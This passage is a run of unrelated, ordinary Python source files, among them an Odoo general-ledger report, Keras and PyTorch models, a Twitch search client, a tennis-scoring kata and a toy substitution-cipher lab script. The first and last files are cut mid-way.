_USERCONFIG.fields_by_name['github'].message_type = _GITHUBCONFIG
DESCRIPTOR.message_types_by_name['UserConfig'] = _USERCONFIG
DESCRIPTOR.message_types_by_name['LocalConfig'] = _LOCALCONFIG
DESCRIPTOR.message_types_by_name['GitHubConfig'] = _GITHUBCONFIG
_sym_db.RegisterFileDescriptor(DESCRIPTOR)
UserConfig = _reflection.GeneratedProtocolMessageType('UserConfig', (_message.Message,), dict(
DESCRIPTOR = _USERCONFIG,
__module__ = 'user_config_pb2'
# @@protoc_insertion_point(class_scope:googleapis.artman.UserConfig)
))
_sym_db.RegisterMessage(UserConfig)
LocalConfig = _reflection.GeneratedProtocolMessageType('LocalConfig', (_message.Message,), dict(
DESCRIPTOR = _LOCALCONFIG,
__module__ = 'user_config_pb2'
# @@protoc_insertion_point(class_scope:googleapis.artman.LocalConfig)
))
_sym_db.RegisterMessage(LocalConfig)
GitHubConfig = _reflection.GeneratedProtocolMessageType('GitHubConfig', (_message.Message,), dict(
DESCRIPTOR = _GITHUBCONFIG,
__module__ = 'user_config_pb2'
# @@protoc_insertion_point(class_scope:googleapis.artman.GitHubConfig)
))
_sym_db.RegisterMessage(GitHubConfig)
# @@protoc_insertion_point(module_scope)
|
# -*- coding: utf-8 -*-
import time
from odoo import api, models, _
from odoo.exceptions import UserError
class ReportGeneralLedger(models.AbstractModel):
_name = 'report.accounting_pdf_reports.report_generalledger'
def _get_account_move_entry(self, accounts, init_balance, sortby, display_account):
"""
:param:
accounts: the recordset of accounts
init_balance: boolean value of initial_balance
sortby: sorting by date or partner and journal
display_account: type of account(receivable, payable and both)
Returns a dictionary of accounts with following key and value {
'code': account code,
'name': account name,
'debit': sum of total debit amount,
'credit': sum of total credit amount,
'balance': total balance,
'amount_currency': sum of amount_currency,
'move_lines': list of move line
}
"""
cr = self.env.cr
MoveLine = self.env['account.move.line']
move_lines = {x: [] for x in accounts.ids}
# Prepare initial sql query and Get the initial move lines
if init_balance:
init_tables, init_where_clause, init_where_params = MoveLine.with_context(date_from=self.env.context.get('date_from'), date_to=False, initial_bal=True)._query_get()
init_wheres = [""]
if init_where_clause.strip():
init_wheres.append(init_where_clause.strip())
init_filters = " AND ".join(init_wheres)
filters = init_filters.replace('account_move_line__move_id', 'm').replace('account_move_line', 'l')
sql = ("""SELECT 0 AS lid, l.account_id AS account_id, '' AS ldate, '' AS lcode, 0.0 AS amount_currency, '' AS lref, 'Initial Balance' AS lname, COALESCE(SUM(l.debit),0.0) AS debit, COALESCE(SUM(l.credit),0.0) AS credit, COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) as balance, '' AS lpartner_id,\
'' AS move_name, '' AS mmove_id, '' AS currency_code,\
NULL AS currency_id,\
'' AS invoice_id, '' AS invoice_type, '' AS invoice_number,\
'' AS partner_name\
FROM account_move_line l\
LEFT JOIN account_move m ON (l.move_id=m.id)\
LEFT JOIN res_currency c ON (l.currency_id=c.id)\
LEFT JOIN res_partner p ON (l.partner_id=p.id)\
LEFT JOIN account_invoice i ON (m.id =i.move_id)\
JOIN account_journal j ON (l.journal_id=j.id)\
WHERE l.account_id IN %s""" + filters + ' GROUP BY l.account_id')
params = (tuple(accounts.ids),) + tuple(init_where_params)
cr.execute(sql, params)
for row in cr.dictfetchall():
move_lines[row.pop('account_id')].append(row)
sql_sort = 'l.date, l.move_id'
if sortby == 'sort_journal_partner':
sql_sort = 'j.code, p.name, l.move_id'
# Prepare sql query base on selected parameters from wizard
tables, where_clause, where_params = MoveLine._query_get()
wheres = [""]
if where_clause.strip():
wheres.append(where_clause.strip())
filters = " AND ".join(wheres)
filters = filters.replace('account_move_line__move_id', 'm').replace('account_move_line', 'l')
# Get move lines base on sql query and Calculate the total balance of move lines
sql = ('''SELECT l.id AS lid, l.account_id AS account_id, l.date AS ldate, j.code AS lcode, l.currency_id, l.amount_currency, l.ref AS lref, l.name AS lname, COALESCE(l.debit,0) AS debit, COALESCE(l.credit,0) AS credit, COALESCE(SUM(l.debit),0) - COALESCE(SUM(l.credit), 0) AS balance,\
m.name AS move_name, c.symbol AS currency_code, p.name AS partner_name\
FROM account_move_line l\
JOIN account_move m ON (l.move_id=m.id)\
LEFT JOIN res_currency c ON (l.currency_id=c.id)\
LEFT JOIN res_partner p ON (l.partner_id=p.id)\
JOIN account_journal j ON (l.journal_id=j.id)\
JOIN account_account acc ON (l.account_id = acc.id) \
WHERE l.account_id IN %s ''' + filters + ''' GROUP BY l.id, l.account_id, l.date, j.code, l.currency_id, l.amount_currency, l.ref, l.name, m.name, c.symbol, p.name ORDER BY ''' + sql_sort)
params = (tuple(accounts.ids),) + tuple(where_params)
cr.execute(sql, params)
for row in cr.dictfetchall():
balance = 0
for line in move_lines.get(row['account_id']):
balance += line['debit'] - line['credit']
row['balance'] += balance
move_lines[row.pop('account_id')].append(row)
# Calculate the debit, credit and balance for Accounts
account_res = []
for account in accounts:
currency = account.currency_id and account.currency_id or account.company_id.currency_id
res = dict((fn, 0.0) for fn in ['credit', 'debit', 'balance'])
res['code'] = account.code
res['name'] = account.name
res['move_lines'] = move_lines[account.id]
for line in res.get('move_lines'):
res['debit'] += line['debit']
res['credit'] += line['credit']
res['balance'] = line['balance']
if display_account == 'all':
account_res.append(res)
if display_account == 'movement' and res.get('move_lines'):
account_res.append(res)
if display_account == 'not_zero' and not currency.is_zero(res['balance']):
account_res.append(res)
return account_res
@api.model
def _get_report_values(self, docids, data=None):
if not data.get('form') or not self.env.context.get('active_model'):
raise UserError(_("Form content is missing, this report cannot be printed."))
self.model = self.env.context.get('active_model')
docs = self.env[self.model].browse(self.env.context.get('active_ids', []))
init_balance = data['form'].get('initial_balance', True)
sortby = data['form'].get('sortby', 'sort_date')
display_account = data['form']['display_account']
codes = []
if data['form'].get('journal_ids', False):
codes = [journal.code for journal in self.env['account.journal'].search([('id', 'in', data['form']['journal_ids'])])]
accounts = docs if self.model == 'account.account' else self.env['account.account'].search([])
accounts_res = self.with_context(data['form'].get('used_context',{}))._get_account_move_entry(accounts, init_balance, sortby, display_account)
return {
'doc_ids': docids,
'doc_model': self.model,
'data': data['form'],
'docs': docs,
'time': time,
'Accounts': accounts_res,
'print_journal': codes,
}
|
import os
import logging
from keras.layers import Dense, Input, MaxPooling2D
from keras.layers import Conv2D, Flatten, Lambda, Dropout
from keras.layers import Reshape, Conv2DTranspose
from keras.models import Model
from keras.losses import mse
from keras.utils import plot_model
from keras import backend as K
from datetime import datetime
# import argparse
# parser = argparse.ArgumentParser()
# parser.add_argument("-ld", "--latent_dim", type=int)
# parser.add_argument("-f", "--filters", type=int)
# parser.add_argument("-k", "--kernel", type=int)
# parser.add_argument("-ad", "--above_dense", type=int)
# args = parser.parse_args()
# latent_dim = args.latent_dim
# filters = args.filters
# kernel_size = args.kernel
# above_dense = args.above_dense
logging.getLogger('tensorflow').disabled = True
class ModelController:
def __init__(self, latent_dim, filters, kernel_size, above_dense):
self.latent_dim = latent_dim
self.filters = filters
self.kernel_size = kernel_size
self.above_dense = above_dense
def sampling(self, args):
z_mean, z_log_sigma = args
batch = K.shape(z_mean)[0]
epsilon = K.random_normal(shape=(batch, self.latent_dim),
mean=0., stddev=1.)
return z_mean + K.exp(z_log_sigma) * epsilon
def encoder_model(self, input_shape):
# build encoder model
# input_shape = x_train.shape[1:]
inputs = Input(shape=input_shape, name='encoder_input')
x = inputs
for i in range(2):
self.filters *= 2
x = Conv2D(filters=self.filters,
kernel_size=self.kernel_size,
activation='relu',
padding='same')(x)
x = MaxPooling2D(pool_size=(2, 2))(x)
# x = Dropout(.2)
# shape info needed to build decoder model
shape = K.int_shape(x)
x = Flatten()(x)
x = Dense(self.above_dense, activation='relu')(x)
z_mean = Dense(self.latent_dim, name='z_mean')(x)
z_log_var = Dense(self.latent_dim, name='z_log_var')(x)
z = Lambda(self.sampling)([z_mean, z_log_var])
# instantiate encoder model
# encoder = Model(inputs, [z_mean, z_log_var, z], name='encoder')
encoder = Model(inputs, z, name='encoder')
now = datetime.now()
model_name = str(now.day) + str(now.strftime("%X")) + 'enc'
if not os.path.exists('model'):
os.mkdir('model')
plot_model(encoder, to_file='model/{}.png'.format(model_name), show_shapes=True)
# print(encoder.summary())
# print("---------------------------"*10)
return inputs, shape, encoder, z_mean, z_log_var
def decoder_model(self, shape):
latent_inputs = Input(shape=(self.latent_dim,), name='z_sampling')
x = Dense(shape[1] * shape[2] * shape[3], activation='relu')(latent_inputs)
x = Reshape((shape[1], shape[2], shape[3]))(x)
print("x shape", x.shape)
for i in range(2):
x = Conv2DTranspose(filters=self.filters,
kernel_size=self.kernel_size,
activation='relu',
strides=2,
padding='same')(x)
self.filters //= 2
outputs = Conv2DTranspose(filters=1,
kernel_size=self.kernel_size,
activation='sigmoid',
padding='same',
name='decoder_output')(x)
# instantiate decoder model
decoder = Model(latent_inputs, outputs, name='decoder')
now = datetime.now()
model_name = str(now.day) + str(now.strftime("%X")) + 'dec'
# print(decoder.summary())
# print("----------------------------"*10)
plot_model(decoder, to_file='model/{}.png'.format(model_name), show_shapes=True)
return decoder
if __name__ == '__main__':
kernel_size = 3
filters = 64
latent_dim = 128
epochs = 4
above_dense = 512
modelobj = ModelController(latent_dim, filters, kernel_size, above_dense)
input_shape = (256, 344, 1)
inputs, shape, encoder, z_mean, z_log_var = modelobj.encoder_model(input_shape)
decoder = modelobj.decoder_model(shape)
outputs = outputs = decoder(encoder(inputs))
vae = Model(inputs, outputs, name='vae')
vae.summary()
|
import numpy as np
import bayesfast as bf
import numdifftools as nd
bf.utils.random.set_generator(0)
rng = bf.utils.random.get_generator()
x = rng.normal(size=(50, 4))
def poly_f(x):
return (
x[..., 0]**3 - 2 * x[..., 1]**3 + 3 * x[..., 1] * x[..., 2] * x[..., 3]
- 4 * x[..., 2]**2 * x[..., 3] + 5 * x[..., 0]**2
- 6 * x[..., 0] * x[..., 2] + 7 * x[..., 1] - 8
)[..., np.newaxis]
def test_poly():
s = bf.modules.PolyModel('cubic-3', input_size=4, output_size=1)
y = poly_f(x)
s.fit(x, y)
y_s = np.concatenate([s(x_i) for x_i in x])
assert np.isclose(y_s, y).all()
j = nd.Gradient(lambda x: poly_f(x).flatten())(x[0])[np.newaxis]
j_s = s.jac(x[0])[0]
assert np.isclose(j_s, j).all()
|
from typing import Sequence
from maru.feature.extractor.abstract import IFeatureExtractor
from maru.types import FeatureVector, Word
class SuffixExtractor(IFeatureExtractor):
def __init__(self, sizes: Sequence[int] = range(1, 4)):
self._sizes = sorted(sizes)
def extract(self, word: Word) -> FeatureVector:
for size in self._sizes:
suffix = word[-size:]
if suffix == word:
break
yield (f'suffix:{suffix}', 1)
|
import torch.nn as nn
import torch.nn.functional as F
from base import BaseModel
class MnistModel(BaseModel):
def __init__(self, num_classes=10):
super().__init__()
self.conv1 = nn.Conv2d(1, 10, kernel_size=5)
self.conv2 = nn.Conv2d(10, 20, kernel_size=5)
self.conv2_drop = nn.Dropout2d()
self.fc1 = nn.Linear(320, 50)
self.fc2 = nn.Linear(50, num_classes)
def forward(self, x):
x = F.relu(F.max_pool2d(self.conv1(x), 2))
x = F.relu(F.max_pool2d(self.conv2_drop(self.conv2(x)), 2))
x = x.view(-1, 320)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1)
class MitbihModel(BaseModel):
def __init__(self, num_classes=5):
super().__init__()
self.conv1 = nn.Conv1d(1, 4, kernel_size=3)
self.conv2 = nn.Conv1d(4, 16, kernel_size=3)
self.conv3 = nn.Conv1d(16, 32, kernel_size=3)
self.conv4 = nn.Conv1d(32, 64, kernel_size=3)
self.conv4_drop = nn.Dropout()
self.fc1 = nn.Linear(512, 128)
self.fc2 = nn.Linear(128, num_classes)
def forward(self, x):
x = F.relu(F.max_pool1d(self.conv1(x), 3))
x = F.relu(F.max_pool1d(self.conv2(x), 3))
x = F.relu(F.avg_pool1d(self.conv3(x), 3))
x = F.relu(self.conv4_drop(self.conv4(x)))
x = x.view(-1, 512)
x = F.relu(self.fc1(x))
x = F.dropout(x, training=self.training)
x = self.fc2(x)
return F.log_softmax(x, dim=1) |
# -*- coding: utf-8 -*-
'''A module to run the development server.'''
from wordfusion import app
app.run(debug=True)
|
"""
[5/12/2014] Challenge #162 [Easy] Novel Compression, pt. 1: Unpacking the Data
https://www.reddit.com/r/dailyprogrammer/comments/25clki/5122014_challenge_162_easy_novel_compression_pt_1/
# [](#EasyIcon) _(Easy)_: Novel Compression, pt. 1: Unpacking the Data
Welcome to this week's Theme Week. We're going to be creating our very own basic compression format for short novels or
writing. This format will probably not be practical for actual use, but may serve as a rudimentary introduction to how
data compression works. As a side task, it is advised to use structured programming techniques, so your program is easy
to extend, modify and maintain later on (ie. later this week.) To keep in line with our Easy-Intermediate-Hard trend,
our first step will be to write the **decompresser**.
The basic idea of this compression scheme will be the dictionary system. Words used in the data will be put into a
dictionary, so instead of repeating phrases over and over again, you can just repeat a number instead, thus saving
space. Also, because this system is based around written text, it will be specifically designed to handle sentences and
punctuation, and will not be geared to handle binary data.
# Formal Inputs and Outputs
## Input Description
The first section of the input we are going to receive will be the dictionary. This dictionary is just a list of words
present in the text we're decompressing. The first line of input will be a number **N** representing how many entries
the dictionary has. Following from that will be a list of **N** words, on separate lines. This will be our simple
dictionary. After this will be the data.
## Data Format
The pre-compressed data will be split up into human-readable 'chunks', representing one little segment of the output.
In a practical compression system, they will be represented by a few bytes rather than text, but doing it this way
makes it easier to write. Our chunks will follow 7 simple rules:
* If the chunk is just a number (eg. `37`), word number 37 from the dictionary (zero-indexed, so 0 is the 1st word) is
printed **lower-case**.
* If the chunk is a number followed by a caret (eg. `37^`), then word 37 from the dictionary will be printed
lower-case, **with the first letter capitalised**.
* If the chunk is a number followed by an exclamation point (eg. `37!`), then word 37 from the dictionary will be
printed **upper-case**.
* If it's a hyphen (`-`), then instead of putting a space in-between the previous and next words, put a hyphen instead.
* If it's any of the following symbols: `. , ? ! ; :`, then put that symbol at the end of the previous outputted word.
* If it's a letter `R` (upper or lower), print a new line.
* If it's a letter `E` (upper or lower), the end of input has been reached.
Remember, this is just for basic text, so not all possible inputs can be compressed. Ignore any other whitespace, like
tabs or newlines, in the input.
**Note**: All words will be in the Latin alphabet.
## Example Data
Therefore, if our dictionary consists of the following:
is
my
hello
name
stan
And we are given the following chunks:
2! ! R 1^ 3 0 4^ . E
Then the output text is:
HELLO!
My name is Stan.
Words are always separated by spaces unless they're hyphenated.
## Output Description
Print the resultant decompressed data from your decompression algorithm, using the rules described above.
# Challenge
## Challenge Input
20
i
do
house
with
mouse
in
not
like
them
ham
a
anywhere
green
eggs
and
here
or
there
sam
am
0^ 1 6 7 8 5 10 2 . R
0^ 1 6 7 8 3 10 4 . R
0^ 1 6 7 8 15 16 17 . R
0^ 1 6 7 8 11 . R
0^ 1 6 7 12 13 14 9 . R
0^ 1 6 7 8 , 18^ - 0^ - 19 . R E
(Line breaks added in data for clarity and ease of testing.)
## Expected Challenge Output
I do not like them in a house.
I do not like them with a mouse.
I do not like them here or there.
I do not like them anywhere.
I do not like green eggs and ham.
I do not like them, Sam-I-am.
"""
def main():
pass
if __name__ == "__main__":
main()
|
import toml
snooty = toml.load("scripts/rstspec.toml")
snippets = []
for directive in snooty["directive"]:
if "example" in snooty["directive"][directive]:
print("Working on {}\n\n".format(directive))
# Don't build snippets for devhub-only directives - they're handled elsewhere
if str(directive).startswith("devhub:"):
continue
else:
snippet_string = '"{directive}": {{\n\t"prefix":"{directive}",\n\t"body": "{example}",\n\t"description": "{help}"}}'
example_raw = snooty["directive"][directive]["example"]
example = example_raw.replace("\n", "\\n")
if "help" in snooty["directive"][directive]:
help = snooty["directive"][directive]["help"].replace("\n", "\\n")
else:
help = directive
snippet = snippet_string.format(
directive=directive, example=example, help=help
)
snippets.append(snippet)
snippet_file = ",\n".join(snippets)
with open("./snippets/snooty.code-snippets", "w") as outfile:
outfile.write("{\n")
outfile.write(snippet_file)
outfile.write("}")
|
# Octave example:
# [W,s,v] = svd((repmat(sum(x.*x,1), size(x,1),1).*x)*x^1);
|
from model.group import Group
from random import randrange
import pytest
import random
import string
def random_string(prefix, maxlen):
symbols = string.ascii_letters + string.digits + " "*10
return prefix + "".join([random.choice(symbols) for i in range(random.randrange(maxlen))])
test_data = [
Group(name=random_string("name", 10), header=random_string("header", 20), footer=random_string("footer", 20))
for i in range(2)
]
@pytest.mark.parametrize("group", test_data, ids=[repr(x) for x in test_data])
def test_edit_name(app, db, group):
if len(db.get_group_list()) == 0:
app.group.create(Group(name='new group name'))
old_groups = db.get_group_list()
editable_group = random.choice(old_groups)
group.id = editable_group.id
app.group.edit_group_by_id(group, group.id)
new_groups = db.get_group_list()
assert len(old_groups) == len(new_groups)
old_groups.remove(editable_group)
old_groups.append(group)
assert sorted(old_groups, key=Group.id_or_max) == sorted(new_groups, key=Group.id_or_max)
|
from .UrlParser import TwitchUrlParser
from .PlaylistAccessToken import TwitchPlaylist
from Core import GlobalExceptions
from Services.Utils.WorkerThreads import WorkerThread
from Services.Twitch.Gql import TwitchGqlAPI
from Services.Twitch.Playback import TwitchPlaybackAccessTokens
class Exceptions(GlobalExceptions.Exceptions):
class InvalidURL(Exception):
def __str__(self):
return "Invalid URL"
class ChannelNotFound(Exception):
def __str__(self):
return "Channel Not Found"
class VideoNotFound(Exception):
def __str__(self):
return "Video Not Found"
class ClipNotFound(Exception):
def __str__(self):
return "Clip Not Found"
class Search:
API = TwitchGqlAPI.TwitchGqlAPI()
@classmethod
def Query(cls, mode, query):
if mode.isUrl():
parseUrl = TwitchUrlParser(query)
mode, query = parseUrl.type, parseUrl.data
if mode == None:
playlist = TwitchPlaylist(query)
if playlist.found:
return playlist
else:
raise Exceptions.InvalidURL
if mode.isChannel():
try:
return cls.API.getChannel(login=query)
except Exception as e:
if type(e) == TwitchGqlAPI.Exceptions.DataNotFound:
raise Exceptions.ChannelNotFound
else:
raise Exceptions.NetworkError
elif mode.isVideo():
try:
return cls.API.getVideo(query)
except Exception as e:
if type(e) == TwitchGqlAPI.Exceptions.DataNotFound:
raise Exceptions.VideoNotFound
else:
raise Exceptions.NetworkError
else:
try:
return cls.API.getClip(query)
except Exception as e:
if type(e) == TwitchGqlAPI.Exceptions.DataNotFound:
raise Exceptions.ClipNotFound
else:
raise Exceptions.NetworkError
@classmethod
def Channel(cls, username):
try:
return cls.API.getChannel(login=username)
except TwitchGqlAPI.Exceptions.DataNotFound:
raise Exceptions.ChannelNotFound
except:
raise Exceptions.NetworkError
@classmethod
def ChannelVideos(cls, channel, videoType, sort, cursor):
try:
return cls.API.getChannelVideos(channel, videoType, sort, cursor=cursor)
except TwitchGqlAPI.Exceptions.DataNotFound:
raise Exceptions.ChannelNotFound
except:
raise Exceptions.NetworkError
@classmethod
def ChannelClips(cls, channel, filter, cursor):
try:
return cls.API.getChannelClips(channel, filter, cursor=cursor)
except TwitchGqlAPI.Exceptions.DataNotFound:
raise Exceptions.ChannelNotFound
except:
raise Exceptions.NetworkError
@classmethod
def StreamAccessToken(cls, login, oAuthToken):
try:
return TwitchPlaybackAccessTokens.TwitchStream(login, oAuthToken)
except TwitchPlaybackAccessTokens.Exceptions.TokenError:
raise TwitchPlaybackAccessTokens.Exceptions.TokenError
except:
raise Exceptions.NetworkError
@classmethod
def VideoAccessToken(cls, videoId, oAuthToken):
try:
return TwitchPlaybackAccessTokens.TwitchVideo(videoId, oAuthToken)
except TwitchPlaybackAccessTokens.Exceptions.TokenError:
raise TwitchPlaybackAccessTokens.Exceptions.TokenError
except:
raise Exceptions.NetworkError
@classmethod
def ClipAccessToken(cls, slug, oAuthToken):
try:
return TwitchPlaybackAccessTokens.TwitchClip(slug, oAuthToken)
except TwitchPlaybackAccessTokens.Exceptions.TokenError:
raise TwitchPlaybackAccessTokens.Exceptions.TokenError
except:
raise Exceptions.NetworkError
class SearchThread(WorkerThread):
def __init__(self, target, callback, args=None, kwargs=None):
super().__init__(target, args, kwargs)
self.resultSignal.connect(callback)
self.start() |
import sys
for line in sys.stdin:
if line.startswith('#'):
print line.strip()
else:
print line[31:38].strip(), line[38:46].strip(), line[46:54].strip()
|
# -*- coding: utf-8 -*-
class Player:
def __init__(self, name):
self.name = name
self.points = 0
def win_point(self):
self.points += 1
def won_with(self, other_player):
return self.points >= 4 and other_player.points >= 0 and \
(self.points - other_player.points) >= 2
def advantage_over(self, other_player):
return self.points > other_player.points and other_player.points >= 3
class Translator:
def __init__(self):
pass
def translate(self, score_1, score_2):
if score_1 == score_2 and score_1 < 3:
return self.score_to_word(score_1) + "-All"
if score_1 == score_2 and score_1 > 2:
return "Deuce"
return self.score_to_word(score_1) + "-" + self.score_to_word(score_2)
def score_to_word(self, score):
return {
0: "Love",
1: "Fifteen",
2: "Thirty",
3: "Forty"
}[score]
class TennisGame:
def __init__(self, player_1_name, player_2_name):
self.player_1 = Player(player_1_name)
self.player_2 = Player(player_2_name)
self.translator = Translator()
def won_point(self, player_name):
if player_name == self.player_1.name:
self.player_1.win_point()
else:
self.player_2.win_point()
def score(self):
if self.player_1.won_with(self.player_2):
return "Win for " + self.player_1.name
if self.player_2.won_with(self.player_1):
return "Win for " + self.player_2.name
if self.player_1.advantage_over(self.player_2):
return "Advantage " + self.player_1.name
if self.player_2.advantage_over(self.player_1):
return "Advantage " + self.player_2.name
return self.translator.translate(
self.player_1.points,
self.player_2.points)
|
import numpy as np
from ..local_interpolation import ThirdOrderHermitePolynomialInterpolation
from .base import AbstractAdaptiveSDESolver, AbstractStratonovichSolver
from .runge_kutta import AbstractERK, ButcherTableau
_midpoint_tableau = ButcherTableau(
a_lower=(np.array([0.5]),),
b_sol=np.array([0.0, 1.0]),
b_error=np.array([1.0, -1.0]),
c=np.array([0.5]),
)
class Midpoint(AbstractERK, AbstractStratonovichSolver, AbstractAdaptiveSDESolver):
"""Midpoint method.
2nd order explicit Runge--Kutta method. Has an embedded Euler method for adaptive
step sizing.
Also sometimes known as the "modified Euler method".
When used to solve SDEs, converges to the Stratonovich solution.
"""
tableau = _midpoint_tableau
interpolation_cls = ThirdOrderHermitePolynomialInterpolation.from_k
def order(self, terms):
return 2
def strong_order(self, terms):
return 0.5
|
from django.conf.urls import url
from . import views
urlpatterns = [
url(r'^$', views.view_form, name='view_form'),
url(r'^create_form$', views.create_form, name='create_form'),
url(r'^created_form$', views.created_form, name='created_form'),
]
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Copyright 2019 The FATE Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
#
################################################################################
#
#
################################################################################
# =============================================================================
# Param Exact Class
# =============================================================================
from federatedml.util import consts
import json
import inspect
class ParamExtract(object):
def __init__(self):
pass
@staticmethod
def parse_param_from_config(param_var, config_file):
"""
load json in config_file and initialize all variables define in param_var by json config
Parameters
----------
param_var : object, define in federatedml.param.param,
the parameter object need to be initialized.
config_file : str, the path of json config path,
define by users, the variables in param object the user want to initialize.
Returns
-------
param_var : object, define in federatedml.param.param,
the initialized result
"""
config_json = None
with open(config_file, "r") as fin:
config_json = json.loads(fin.read())
# print('In param extract, config_json is :{}'.format(config_json))
if config_json is None:
raise Exception("config file is not valid, please have a check!")
from federatedml.param import param
valid_classes = [class_info[0] for class_info in inspect.getmembers(param, inspect.isclass)]
param_var = ParamExtract.recursive_parse_param_from_config(param_var, config_json, valid_classes,
param_parse_depth=0)
return param_var
@staticmethod
def recursive_parse_param_from_config(param, config_json, valid_classes, param_parse_depth):
"""
Initialize all variables by config.
If variable is define in federatedml.param.param, then recursively initialize it,
otherwise, just assignment the value define in config.
Parameters
----------
param : object, define in federatedml.param.param,
the parameter object need to be initialized.
config_json : dict, a dict load by the config file,
the variables config.
valid_classes : list, all objects define in federatedml.param.param,
use to judge if the type of a variable is self-define param object or not
param_parse_depth : int, max recursive depth.
Returns
-------
param : object, define in federatedml.param.param,
the initialized result
"""
if param_parse_depth > consts.PARAM_MAXDEPTH:
raise ValueError("Param define nesting too deep!!!, can not parse it")
default_section = type(param).__name__
inst_variables = param.__dict__
for variable in inst_variables:
attr = getattr(param, variable)
if type(attr).__name__ in valid_classes:
sub_params = ParamExtract.recursive_parse_param_from_config(attr, config_json, valid_classes,
param_parse_depth + 1)
setattr(param, variable, sub_params)
else:
if default_section in config_json and variable in config_json[default_section]:
option = config_json[default_section][variable]
setattr(param, variable, option)
return param
@staticmethod
def is_class(var):
return hasattr(var, "__class__")
|
#!/usr/bin/python
'''_____________________________________________________________________________
'
' Created By: Kevin M. Albright
' Creation Date: 04.13.2014
'
' Modified By: Kevin M. Albright
' Last Modified: 04.14.2014
'
' Assignment: Lab8
' File Name: albright_lab8.py
' Purpose: This program will
' (1) Open and read in the contents of provided file name.
' (2) Using a dictionary write out to another file the
' values matching keys in the dictionary character by
' character.
' The program will check that the provided file name is a
' valid file, if invalid will print a message and exit.
' If no arguments are provided, will print out instructions on
' how to use program.
' The user can provide the flag "-d" to have the program
' decrypt the provided file.
' Encrypted files are named "encrypted_" + filename
' Decrypted files are named "decrypted_" + filename
' Decrypting will remove "encrypted_" from filename when
' making decrypted filename.
' Files writen are located in programs directory.
' Dictionary keys and values are stored as the ASCII code
' values.
_____________________________________________________________________________'''
#from random import sample ## Prevusly used to create the First iteration of
## random values. Tweaked this to get final
## values used.
from sys import argv
from os.path import isfile ## for File checks.
from os.path import basename ## for file name from path.
from string import lower
from string import replace
#|||| Check input arguments.
if len(argv) == 1: ## No arguments prints Instuctions
print '\n____ To use this script:'
print ' ./albright_lab8.py filename [-d]'
print ' Encrypt: ./albright_lab8.py text.txt'
print ' Decrypt: ./albright_lab8.py encrypted_text.txt -d'
print ' Flag: -d for decryption'
print ' No flag for encryption.\n'
exit()
elif len(argv) > 1: ## If arguments given.
if not isfile(argv[1]): ## Check for valid file.
print '\n>>>>>>> Invalid file. Please enter a valid file name.\n'
exit()
elif len(argv) == 3: ## If flag given
if lower(argv[2]) != '-d':
print '\n>>>>>>> Invalid flag. Please enter -d for decript.'
print ' And no flag for encrypt.\n'
exit()
elif len(argv) > 3: ## If too many argumetns.
print '\n>>>>>>> Invalid. To many input arguments.\n'
exit()
#|||| Open files, Name Encrypt file or Decrypt file.
fin = open(argv[1]) ## Open input file.
if len(argv) == 3 and argv[2].lower() == '-d': ## Create decrypt file.
fout = open('decrypted_' + replace(basename(argv[1]),'encrypted_','',1),"w")
else: ## Create encrypt file.
fout = open('encrypted_' + basename(argv[1]),"w")
keys = [9,10] + range(32,127) ## Create character keys as ordinals.
#sample(keys,len(keys)) ## Old random values maker.
## Make values for keys.
values = [80,90,86,48,102,46,40,62,71,83,115,43,44,69,101,39,59,99,54,67,100,118,105,33,42,119,88,91,114,109,96,37,79,97,116,55,65,56,125,75,52,111,112,77,103,123,87,10,94,81,76,49,104,68,9,64,57,93,73,60,120,38,70,85,82,89,63,34,110,36,84,113,66,78,108,47,41,61,117,45,58,126,53,92,72,50,124,51,98,122,32,106,74,95,35,107,121]
if len(argv) == 3 and argv[2].lower() == '-d': ## Decrypt dictionary.
code = dict(zip(values,keys))
else: ## Encrypt dictionary.
code = dict(zip(keys,values))
input = fin.read() ## Read file.
for char in input:
if code.has_key(ord(char)): ## If code has key print value as char.
fout.write(chr(code[ord(char)]))
else: ## Else just reprint char from file.
fout.write(char)
fout.close()
fin.close()
|
import os
if os.environ.get('RUN_ON_DORA'):
import dorasl as DoraServerless
dora = DoraServerless.Dora()
number_of_replicas = 3
number_of_gpu = 1
number_of_cpu = '200m'
dora.upload('./', 'home', 'pytest45')
dora.sync('./', 'home', 'pytest45', True)
# Setup the workload
wk = DoraServerless.Workload('my.py')
wk.set_replica(number_of_replicas)
wk.set_image('tensorflow/tensorflow')
wk.set_gpu('', number_of_gpu)
#wk.set_cpu('All', number_of_cpu)
wk.add_volume({'name': 'home', 'target': '/home'})
wk.drain_on_exit()
wk.apply()
for x in range(number_of_replicas):
wk.wait_readiness(str(x + 1))
#for x in range(number_of_replicas):
# wk.exec(str(x + 1), ['python3', '/home/pytest1/test.py'], False)
wk.exec('1', '/bin/bash')
dora.close()
# This is what will be executed inside Dora
import time
for x in range(50):
print(x)
time.sleep(1)
|
def f(n,left):
if n==1 or n==2:
return 1
if n==3:
return 2
if n>3 and left==3:
return f(3,0)*f(n-3,0)
if n>3 and left>3:
return f(3,left-2)*f(n-2,left-2)+f(1,0)*f(n-1,left-1)
if __name__=='__main__':
for step in range(1,11):
print '%3d step has %10d method' % (step,f(step,step))
|
import numpy as np
from scipy import optimize as opt
import math
# Create coefficient tables to solve for equations of state
PS_COEFF = np.zeros([10, 10])
PS_COEFF[0][2] = 0.24657688*math.pow(10, 6)
PS_COEFF[0][3] = 0.51359951*math.pow(10, 2)
PS_COEFF[1][2] = 0.58638965*math.pow(10, 0)
PS_COEFF[1][3] = -0.28646939*math.pow(10, -2)
PS_COEFF[1][4] = 0.31375577*math.pow(10, -4)
PS_COEFF[2][2] = -0.62783840*math.pow(10, 1)
PS_COEFF[2][3] = 0.14791599*math.pow(10, -1)
PS_COEFF[2][4] = 0.35779579*math.pow(10, -3)
PS_COEFF[2][5] = 0.15432925*math.pow(10, -7)
PS_COEFF[3][3] = -0.42719875*math.pow(10, 0)
PS_COEFF[3][4] = -0.16325155*math.pow(10, -4)
PS_COEFF[4][2] = 0.56654978*math.pow(10, 4)
